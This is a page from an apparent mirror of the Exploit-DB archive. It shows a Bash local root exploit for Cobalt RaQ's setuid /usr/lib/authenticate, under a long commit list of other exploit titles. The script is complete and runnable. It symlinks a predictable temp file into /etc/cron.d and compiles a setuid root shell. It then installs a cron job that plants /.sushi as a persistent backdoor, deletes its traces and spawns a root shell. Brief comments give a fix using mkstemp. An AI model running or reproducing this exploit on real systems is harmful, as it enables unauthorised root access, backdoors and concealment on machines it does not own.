bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/21733.sh
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

146 lines
No EOL
3.5 KiB
Bash
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/5529/info
A vulnerability has been reported in Cobalt RaQ that may allow attackers to obtain elevated privileges. The vulnerability exists in the /usr/lib/authenticate utility which is used by Apache for authentication purposes. Reportedly, the utility creates temporary files with predictable names with world-writeable permissions. This vulnerability is further exacerbated by the fact that /usr/lib/authenticate is a setuid root binary.
#!/bin/sh
#
# Cobalt Linux 6.0 Local Root Exploit
#
# Effects: <= apache-1.3.20-RaQ4_1C3 (AFAIK all Cobalt Linux Apache ;)
# Quick Fix: su - root -c "chmod 755 /usr/lib/authenticate"
#
# Problem Source Code:
# fd = open("gmon.out", O_WRONLY|O_CREAT|O_TRUNC, 0666);
#
# Suggested Code:
# fd = mkstemp("/tmp/gmon.out-XXXXXX");
#
# Still need help Cobalt developers? Ok:
# man 3 tmpfile; man 2 open; echo "Thanks core"
#
# by Charles Stevenson <core@bokeoa.com>
#
# Fri Jun 28 03:35:53 MDT 2002
# - initial version
# Sun Jul 7 20:12:41 MDT 2002
# - added some features for robustness
echo "RaQFuCK.sh by core"
target="/usr/lib/authenticate"
tempdir="/tmp"
if [ -u /.sushi ] ; then
exec /.sushi
fi
printf "Checking for $target..."
if [ -f "$target" ] ; then
echo "done."
else
echo "NO!"
exit 1
fi
printf "Checking if $target is setuid root..."
if [ -u "$target" ] ; then
echo "done."
else
echo "NO! Hrm... does this admin have a clue???"
exit 1
fi
if [ ! -d "$tempdir/core" ]; then
printf "Creating $tempdir/core..."
if ! mkdir "$tempdir/core" 2>/dev/null ; then
echo "FAILED!" ; exit 1
fi
echo "done."
fi
printf "Changing directory to $tempdir/core..."
if ! cd "$tempdir/core" 2>/dev/null ; then
echo "FAILED!" ; exit 1
else
echo "done."
fi
printf "Creating cron.d symlink..."
if ! ln -fs /etc/cron.d/core gmon.out 2>/dev/null; then
echo "FAILED!" ; exit 1
else
echo "done."
fi
printf "Changing umask..."
if ! umask 000 ; then
echo "FAILED!" ; exit 1
else
echo "done."
fi
printf "Compiling root shell..."
cat >sushi.c <<EOF
#include <unistd.h>
int main (int argc, char **argv, char **envp) {
setuid(0);
setgid(0);
execve("/bin/sh",argv,envp);
return -1;
}
EOF
if ! cc sushi.c -o sushi 2>/dev/null; then
echo "FAILED!" ; exit 1
else
echo "done."
fi
printf "Compiling cron takeover..."
cat >takeover.c <<EOF
#include <stdlib.h>
main() { system("cp $tempdir/core/sushi /.sushi ; chmod 6777 /.sushi"); }
EOF
if ! cc takeover.c -o own 2>/dev/null; then
echo "FAILED!" ; exit 1
fi
echo "done."
printf "Performing symlink attack..."
printf "\n\n\n\n" | "$target"
if [ -u /etc/cron.d/core ] ; then
echo "SYMLINK ATTACK FAILED!" && exit 1
else
echo "done."
fi
printf "Setting up evil cron job..."
cat >croncore <<EOF
*/1 * * * * root if [ -x "$tempdir/core/own" ] ; then "$tempdir/core/own";
fi
EOF
if ! cat croncore 2>/dev/null >/etc/cron.d/core; then
echo "FAILED!" ; exit 1
else
echo "done."
fi
printf "Waiting for root shell"
while [ ! -u /.sushi ] ; do
sleep 1 ; printf "."
done
echo "done."
cd /
printf "Cleaning up real quick..."
if ! /.sushi -c "rm -rf $tempdir/core /etc/cron.d/core"; then
echo "FAILED??? Fuck it!"
else
echo "done."
fi
echo "Spawning root shell!!! God Damn! I say GOD DAMN!!"
if ! exec /.sushi -i; then
echo "Exec Failed!!! BUMMER!" ; exit 1
fi
Reference in a new issue View git blame Copy permalink